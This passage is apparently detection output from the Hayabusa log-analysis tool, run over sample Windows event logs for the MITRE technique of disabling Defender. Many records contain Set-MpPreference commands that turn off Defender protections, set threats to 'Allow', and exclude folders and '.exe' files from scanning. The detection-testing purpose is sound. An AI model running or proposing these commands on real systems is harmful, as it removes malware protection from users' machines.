value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:52.339 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:52.355 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -DisableInboundConnectionFiltering $true,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:52.423 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" 
ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): 
name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" 
ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:52.423 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:52.430 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense 
Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:34:52.432 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender critical features disabled (PowerShell).evtx +2021-10-06 18:46:09.533 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -EnableControlledFolderAccess Disabled"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x242c | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-06 18:46:13.168 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell.exe -command ""Set-MpPreference -PUAProtection disable"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x21f4 | User: admmig | LID: 0x5f72fee",../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-06 18:46:28.683 +09:00,win10-02.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5} | Path: 
C:\Windows\System32\dllhost.exe | PID: 0x1bcc | User: WIN10-02$ | LID: 0x3e7,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID4688-Defender critical features disabled (command).evtx +2021-10-06 19:08:33.314 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx +2021-10-06 19:08:33.362 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -HighThreatDefaultAction 6 -Force,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx +2021-10-06 19:08:33.671 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""HighThreatDefaultAction""; value=""Allow"" ParameterBinding(Set-MpPreference): name=""Force""; value=""True"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): 
name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" 
ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): 
name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx +2021-10-06 19:08:33.672 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx +2021-10-06 19:08:33.680 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock 
Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx +2021-10-06 19:08:33.683 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender default action allow any (PowerShell).evtx +2021-10-06 20:14:56.275 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 20:14:56.300 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -ExclusionPath c:\document\virus\,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 20:14:56.424 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""ExclusionPath""; value=""c:\document\virus\"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" 
ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDatagramProcessing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCpuThrottleOnIdleScans""; value=""False"" ParameterBinding(Set-MpPreference): 
name=""DisableAutoExclusions""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisablePrivacyMode""; value=""False"" ParameterBinding(Set-MpPreference): name=""RandomizeScheduleTaskTimes""; value=""False"" ParameterBinding(Set-MpPreference): name=""SchedulerRandomizationTime""; value=""0"" ParameterBinding(Set-MpPreference): name=""DisableBehaviorMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIntrusionPreventionSystem""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableIOAVProtection""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRealtimeMonitoring""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScriptScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableArchiveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableCatchupQuickScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableEmailScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRemovableDriveScanning""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRestorePoint""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningMappedNetworkDrivesForFullScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableScanningNetworkFiles""; value=""False"" ParameterBinding(Set-MpPreference): name=""UILockdown""; value=""False"" ParameterBinding(Set-MpPreference): name=""Force""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableBlockAtFirstSeen""; value=""False"" ParameterBinding(Set-MpPreference): name=""CloudExtendedTimeout""; value=""0"" ParameterBinding(Set-MpPreference): name=""EnableLowCpuPriority""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableFileHashComputation""; value=""False"" ParameterBinding(Set-MpPreference): 
name=""EnableFullScanOnBatteryPower""; value=""False"" ParameterBinding(Set-MpPreference): name=""ProxyPacUrl""; value="""" ParameterBinding(Set-MpPreference): name=""ProxyServer""; value="""" ParameterBinding(Set-MpPreference): name=""ForceUseProxyOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableTlsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableHttpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableDnsOverTcpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableSshParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableGradualRelease""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowNetworkProtectionDownLevel""; value=""False"" ParameterBinding(Set-MpPreference): name=""AllowDatagramProcessingOnWinServer""; value=""False"" ParameterBinding(Set-MpPreference): name=""EnableDnsSinkhole""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableInboundConnectionFiltering""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableRdpParsing""; value=""False"" ParameterBinding(Set-MpPreference): name=""DisableNetworkProtectionPerfTelemetry""; value=""False"" ParameterBinding(Set-MpPreference): name=""TrustLabelProtectionStatus""; value=""0"" ParameterBinding(Set-MpPreference): name=""ThrottleLimit""; value=""0"" ParameterBinding(Set-MpPreference): name=""AsJob""; value=""False""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 20:14:56.425 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): 
""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 20:14:56.432 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 20:14:56.435 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 20:15:06.651 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(PSConsoleHostReadLine): ""PSConsoleHostReadLine""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added (PowerShell).evtx +2021-10-06 20:15:06.667 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,Set-MpPreference -ExclusionExtension '.exe',../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.001-Impair Defenses-Disable or Modify tool/ID800-4103-4104 Defender exclusion added 
(PowerShell).evtx +2021-10-06 20:15:06.754 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-MpPreference): ""Set-MpPreference"" ParameterBinding(Set-MpPreference): name=""ExclusionExtension""; value="".exe"" ParameterBinding(Set-MpPreference): name=""QuarantinePurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingAdditionalActionTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingCriticalFailureTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ReportingNonCriticalTimeOut""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanAvgCPULoadFactor""; value=""0"" ParameterBinding(Set-MpPreference): name=""CheckForSignaturesBeforeRunningScan""; value=""False"" ParameterBinding(Set-MpPreference): name=""ScanPurgeItemsAfterDelay""; value=""0"" ParameterBinding(Set-MpPreference): name=""ScanOnlyIfIdleEnabled""; value=""False"" ParameterBinding(Set-MpPreference): name=""ThrottleForScheduledScanOnly""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFirstAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureAuGracePeriod""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureDefinitionUpdateFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureDisableUpdateOnStartupWithoutEngine""; value=""False"" ParameterBinding(Set-MpPreference): name=""SignatureFallbackOrder""; value="""" ParameterBinding(Set-MpPreference): name=""SharedSignaturesPath""; value="""" ParameterBinding(Set-MpPreference): name=""SignatureUpdateCatchupInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobUpdateInterval""; value=""0"" ParameterBinding(Set-MpPreference): name=""SignatureBlobFileSharesSources""; value="""" ParameterBinding(Set-MpPreference): name=""MeteredConnectionUpdates""; value=""False"" 
